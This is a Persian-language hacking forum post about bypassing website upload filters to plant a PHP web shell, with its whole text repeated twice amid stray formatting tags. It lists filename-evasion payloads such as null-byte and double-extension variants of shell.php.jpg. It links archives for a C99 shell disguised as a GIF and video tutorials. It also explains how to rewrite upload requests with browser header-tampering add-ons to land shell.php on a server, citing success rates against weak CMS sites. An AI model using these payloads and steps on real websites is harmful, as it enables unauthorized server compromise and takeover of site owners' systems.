توییت
درود بر عزیزان
عبارتند از :
تغییر نام پسوند شل :
[align=LEFT][php]
shell.php.jpg%00
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg%:
shell.php.jpg;
shell.php.jpg;%00
shell.php.jpg%00;
shell.php.jpg%00:;
shell.php;.jpg
shell.php.jpg
shell.php..jpg
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;
[/php]
[align=RIGHT]تغییر در کد نویسی شل :
[align=LEFT][php]
http://uploaderx.persiangig.com/iranhack-security-team/GIF_To_C99.zip
[/php]
[align=RIGHT]این روش معمولا در cms های نامعتبر و شخصی انجام میپذیرد و در سایر 40% الی 45% هکر موفق به آپلود شل میشود .
یکی از این نوع bypassing ها رو در کلیپ زیر مشاهده کنید :
[align=LEFT][php]http://uploaderx.persiangig.com/iranhack-security-team/Asp Uploader Upload Shell.zip
[/php][/align]
خوب من یک راه پیشنهاد میکنم با پلاگین tamper data شل خودتونو با هر پسوندی دوست دارید آپلود کنید البته اینم 50 الی 55 % عملی هست ولی از روش قبل عملی تر میباشد . شما از 2 پلاگین فایر فاکس جهت تغییر پسوند میتونید استفاده کنید :
[align=LEFT][php]
https://addons.mozilla.org/en-US/firefox/addon/tamper-data
[/php]
[php]
https://addons.mozilla.org/en-US/firefox/addon/live-http-headers
[/php]
[align=RIGHT]اینم فیلم آموزشی نحوه تغییر پسوند شل با استفاده از پلاگین Tamper Data مثلا شما شل خودتونو با اسم shell.php.jpg آپ میکنید و با تغییرات در هدر آپلود به این صورت فایل خودتونو آپلود میکنید : shell.php
[align=LEFT][php]
http://uploaderx.persiangig.com/iranhack-security-team/Bypass%20PHP%20UPload%20Center%20By%20Tamper%20Dat a.zip
[/php]
[align=RIGHT]منتظر ایده های جدید دوستان برای bypassing آپلودر ها در همین تاپیک هستیم با تشکر .[/align][/align][/align]
[/align]
[/align][/align][/align][/align]
عبارتند از :
تغییر نام پسوند شل :
[align=LEFT][php]
shell.php.jpg%00
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg%:
shell.php.jpg;
shell.php.jpg;%00
shell.php.jpg%00;
shell.php.jpg%00:;
shell.php;.jpg
shell.php.jpg
shell.php..jpg
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;
[/php]
[align=RIGHT]تغییر در کد نویسی شل :
[align=LEFT][php]
http://uploaderx.persiangig.com/iranhack-security-team/GIF_To_C99.zip
[/php]
[align=RIGHT]این روش معمولا در cms های نامعتبر و شخصی انجام میپذیرد و در سایر 40% الی 45% هکر موفق به آپلود شل میشود .
یکی از این نوع bypassing ها رو در کلیپ زیر مشاهده کنید :
[align=LEFT][php]http://uploaderx.persiangig.com/iranhack-security-team/Asp Uploader Upload Shell.zip
[/php][/align]
خوب من یک راه پیشنهاد میکنم با پلاگین tamper data شل خودتونو با هر پسوندی دوست دارید آپلود کنید البته اینم 50 الی 55 % عملی هست ولی از روش قبل عملی تر میباشد . شما از 2 پلاگین فایر فاکس جهت تغییر پسوند میتونید استفاده کنید :
[align=LEFT][php]
https://addons.mozilla.org/en-US/firefox/addon/tamper-data
[/php]
[php]
https://addons.mozilla.org/en-US/firefox/addon/live-http-headers
[/php]
[align=RIGHT]اینم فیلم آموزشی نحوه تغییر پسوند شل با استفاده از پلاگین Tamper Data مثلا شما شل خودتونو با اسم shell.php.jpg آپ میکنید و با تغییرات در هدر آپلود به این صورت فایل خودتونو آپلود میکنید : shell.php
[align=LEFT][php]
http://uploaderx.persiangig.com/iranhack-security-team/Bypass%20PHP%20UPload%20Center%20By%20Tamper%20Dat a.zip
[/php]
[align=RIGHT]منتظر ایده های جدید دوستان برای bypassing آپلودر ها در همین تاپیک هستیم با تشکر .[/align][/align][/align]
[/align]
[/align][/align][/align][/align]
[/align]